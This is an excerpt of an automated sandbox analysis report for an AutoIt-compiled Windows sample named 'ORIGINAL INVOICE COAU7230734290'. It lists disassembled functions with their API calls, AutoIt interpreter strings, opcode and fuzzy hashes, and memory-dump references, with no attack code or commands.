                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: fe0e1e4b378d90afdf338948e5d3a29016f1f93380545b62c627c7af01b5f727
                                                              • Instruction ID: 8ac3d25c13dff0aac314850de4cf179be0789b2066f696cded3e73f39be23f35
                                                              • Opcode Fuzzy Hash: fe0e1e4b378d90afdf338948e5d3a29016f1f93380545b62c627c7af01b5f727
                                                              • Instruction Fuzzy Hash: 8CD05E320A460EAEDF024FA4EC06EAE3F6AEB04700F408110FA15D50A0C671D531AB50
                                                              Function 0026B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 1881eb14d4e15773cda2e5a04f86913f284fd128ce2ab655b3b42f93cc1e84c0
                                                              • Instruction ID: 4d52c79f6e0006fef506534478bbe1608cd9b7d56af3bff4598173dd8c7a11a0
                                                              • Opcode Fuzzy Hash: 1881eb14d4e15773cda2e5a04f86913f284fd128ce2ab655b3b42f93cc1e84c0
                                                              • Instruction Fuzzy Hash: 79C04CB1410509DFC751CBC0D948AEEB7BCAB04301F1050929106F1110D7709B859F72
                                                              Function 00218189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0021818F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 3a094b85dfa3f096b61bee7320c404c301159d6dacbdf373897daf153666ca94
                                                              • Instruction ID: 77d1d8ea5245a876b1bd71334c162ce1eb626dc6ff02004ed2b36e2cee1e5465
                                                              • Opcode Fuzzy Hash: 3a094b85dfa3f096b61bee7320c404c301159d6dacbdf373897daf153666ca94
                                                              • Instruction Fuzzy Hash: 5EA0113008020CAB8F002B82FC0A8883FACEA002A0B0000A0F80C080208B22A8A08AA2
                                                              Function 001FE3B0 Relevance: .5, Instructions: 540COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a238abb7c476888f8e3e1d04092641949f5fe59883a30a482e372f390386dd4
                                                              • Instruction ID: 8bfcf8b7ed756bb62b640ebf969d872a56cb268b79345efdc74ea4442fb51fc8
                                                              • Opcode Fuzzy Hash: 6a238abb7c476888f8e3e1d04092641949f5fe59883a30a482e372f390386dd4
                                                              • Instruction Fuzzy Hash: 0B22D07490020ACFDB24DF58C490ABEB7F1FF18314F148169EA4A9B3A1E735AD85CB91
                                                              Function 001F93F0 Relevance: .5, Instructions: 531COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d593b4b9c60ac334ca179df64b29784c55d5968dee362681664e2a26a580de3
                                                              • Instruction ID: 4d0d26dd833974cd7516f46d407bd3305519fc2852fceb22fe8c20bbf0f483c2
                                                              • Opcode Fuzzy Hash: 6d593b4b9c60ac334ca179df64b29784c55d5968dee362681664e2a26a580de3
                                                              • Instruction Fuzzy Hash: CB129C70A00609DFDF14DFA8DA85ABEB7F5FF48300F204529E906E7291EB35A965CB50
                                                              Function 001FAF50 Relevance: .5, Instructions: 514COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3728558374-0
                                                              • Opcode ID: 14c1e0df8a7cf5d6ef15baa6c9759cdb8db570824c57cff7f3e3a6ffe2feb1a7
                                                              • Instruction ID: c0d309a971149d4fe1fea154ed1eadcd791e0d48fdb933f144836245260ca75f
                                                              • Opcode Fuzzy Hash: 14c1e0df8a7cf5d6ef15baa6c9759cdb8db570824c57cff7f3e3a6ffe2feb1a7
                                                              • Instruction Fuzzy Hash: 3902C070A10209DBCF14DF68D991ABEBBB5FF48300F118069F906DB295EB30DA65CB91
                                                              Function 002102A4 Relevance: .3, Instructions: 345COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                              • Instruction ID: 3c95d4e9cb955fce32a832931280b6cd70c80e470929015b1cd2906a3919fce6
                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                              • Instruction Fuzzy Hash: A3C1E5322251930ADF6D4A3AC5B447EFAE15AA17F531A036DD8B3CB4D2EF60C5B4D620
                                                              Function 002106D9 Relevance: .3, Instructions: 341COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                              • Instruction ID: 060a10407d4044fe1926214f4744c644e55e390edeb42345d723786e14adde89
                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                              • Instruction Fuzzy Hash: DCC1153222529309DF6D4A39C57447EFAE05EA2BB531A036DD4B3CB4D6EF60C5B4C620
                                                              Function 0020FA57 Relevance: .3, Instructions: 323COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: f37d2a07a0b689ceee6b819c6ecdc7fa541d883d9385c792cfd79d5c8f3bd474
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: 3BC1C73226529309DFBD4A39C63443EBAA15AA27B531A077DD4B3CB9D7EF20C534D610
                                                              Function 0024A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 0024A2FE
                                                              • DeleteObject.GDI32(00000000), ref: 0024A310
                                                              • DestroyWindow.USER32 ref: 0024A31E
                                                              • GetDesktopWindow.USER32 ref: 0024A338
                                                              • GetWindowRect.USER32(00000000), ref: 0024A33F
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0024A480
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0024A490
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A4D8
                                                              • GetClientRect.USER32(00000000,?), ref: 0024A4E4
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0024A51E
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A540
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A553
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A55E
                                                              • GlobalLock.KERNEL32(00000000), ref: 0024A567
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A576
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0024A57F
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A586
                                                              • GlobalFree.KERNEL32(00000000), ref: 0024A591
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A5A3
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0027D9BC,00000000), ref: 0024A5B9
                                                              • GlobalFree.KERNEL32(00000000), ref: 0024A5C9
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0024A5EF
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0024A60E
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A630
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A81D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              • Opcode ID: 24db26b392d4756a90a3973bd0536b439c060165f855cc7d9a0b0213a0fcc7e8
                                                              • Instruction ID: 8f1adfb60622bb63e31b4ae1fdd2cdccd9dcf4a62deec281d65f799c792a635e
                                                              • Opcode Fuzzy Hash: 24db26b392d4756a90a3973bd0536b439c060165f855cc7d9a0b0213a0fcc7e8
                                                              • Instruction Fuzzy Hash: 88027E71910209EFDB14DFA4ED89EAE7BB9FF48310F108159F909AB2A1D770AD51CB60
                                                              Function 0025D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 0025D2DB
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0025D30C
                                                              • GetSysColor.USER32(0000000F), ref: 0025D318
                                                              • SetBkColor.GDI32(?,000000FF), ref: 0025D332
                                                              • SelectObject.GDI32(?,00000000), ref: 0025D341
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0025D36C
                                                              • GetSysColor.USER32(00000010), ref: 0025D374
                                                              • CreateSolidBrush.GDI32(00000000), ref: 0025D37B
                                                              • FrameRect.USER32(?,?,00000000), ref: 0025D38A
                                                              • DeleteObject.GDI32(00000000), ref: 0025D391
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0025D3DC
                                                              • FillRect.USER32(?,?,00000000), ref: 0025D40E
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0025D439
                                                                • Part of subcall function 0025D575: GetSysColor.USER32(00000012), ref: 0025D5AE
                                                                • Part of subcall function 0025D575: SetTextColor.GDI32(?,?), ref: 0025D5B2
                                                                • Part of subcall function 0025D575: GetSysColorBrush.USER32(0000000F), ref: 0025D5C8
                                                                • Part of subcall function 0025D575: GetSysColor.USER32(0000000F), ref: 0025D5D3
                                                                • Part of subcall function 0025D575: GetSysColor.USER32(00000011), ref: 0025D5F0
                                                                • Part of subcall function 0025D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0025D5FE
                                                                • Part of subcall function 0025D575: SelectObject.GDI32(?,00000000), ref: 0025D60F
                                                                • Part of subcall function 0025D575: SetBkColor.GDI32(?,00000000), ref: 0025D618
                                                                • Part of subcall function 0025D575: SelectObject.GDI32(?,?), ref: 0025D625
                                                                • Part of subcall function 0025D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0025D644
                                                                • Part of subcall function 0025D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0025D65B
                                                                • Part of subcall function 0025D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0025D670
                                                                • Part of subcall function 0025D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0025D698
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              • Opcode ID: 9abb9a1d56e3abfe3f2f2e3b86d3f3262a9610e6d2338fbaa96539c99514a8a9
                                                              • Instruction ID: c47fd173993e491d12d3a7a68faa7ffc548124e76a1520fa8b855febc34e513e
                                                              • Opcode Fuzzy Hash: 9abb9a1d56e3abfe3f2f2e3b86d3f3262a9610e6d2338fbaa96539c99514a8a9
                                                              • Instruction Fuzzy Hash: A8918F71408301BFDB109F64EC08A6B7BB9FF85325F500A19F96A961E0D771D984CF52
                                                              Function 0023DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0023DBD6
                                                              • GetDriveTypeW.KERNEL32(?,0028DC54,?,\\.\,0028DC00), ref: 0023DCC3
                                                              • SetErrorMode.KERNEL32(00000000,0028DC54,?,\\.\,0028DC00), ref: 0023DE29
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: 16ddddd99e8381660aa0b32188795417aa5a18564245e39de414e6a82fec197a
                                                              • Instruction ID: f0f87b112ef100baa57c824dd331e3ed54465f02a6da78a1f51489798ff40b9f
                                                              • Opcode Fuzzy Hash: 16ddddd99e8381660aa0b32188795417aa5a18564245e39de414e6a82fec197a
                                                              • Instruction Fuzzy Hash: 7D51B6B127830AABC300DF10E942839B7A6FB66B44F144C1AF40797291DFB0D976DB52
                                                              Function 001FCC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: 34444178ed377d55de816340d9f7cffade6c942ebb1205378201b96bdf91ce1f
                                                              • Instruction ID: e080b07ed1c0d1a0d7068cf35a592f44881fab86f47096103769c4cd1a02b98e
                                                              • Opcode Fuzzy Hash: 34444178ed377d55de816340d9f7cffade6c942ebb1205378201b96bdf91ce1f
                                                              • Instruction Fuzzy Hash: 16812A3165020DABDB24BF64CD42FFF77A9AF25300F044024FA05A61C6EB61D9B5DAD0
                                                              Function 0025C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0025C788
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0025C83E
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0025C859
                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0025CB15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: 4fe65079b79d7f66d24e3b80c653adb03ad58fe38a055fb8cd6b3bcc3352b05f
                                                              • Instruction ID: 645e45c03b27c32585a51c94bcef320149f909d33d586e8e147360aaff990ecc
                                                              • Opcode Fuzzy Hash: 4fe65079b79d7f66d24e3b80c653adb03ad58fe38a055fb8cd6b3bcc3352b05f
                                                              • Instruction Fuzzy Hash: 58F11970124302AFD7118F24DC49BAABBF8FF49356F24061DF998D62A1E774C868CB95
                                                              Function 0025638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,0028DC00), ref: 00256449
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 3964851224-45149045
                                                              • Opcode ID: 9263e98623626168dc40438db77b635a8b824ddee7347f5e09b8faa799b6263a
                                                              • Instruction ID: 90cb5c0477a1050f48589273e05ec7cb1351236c8abb00a40696702dcf6c2cec
                                                              • Opcode Fuzzy Hash: 9263e98623626168dc40438db77b635a8b824ddee7347f5e09b8faa799b6263a
                                                              • Instruction Fuzzy Hash: 47C1CC302243468BCB04EF10C445A7EB7A5AF95744F80485DF8865B2E3DB71EDAECB86
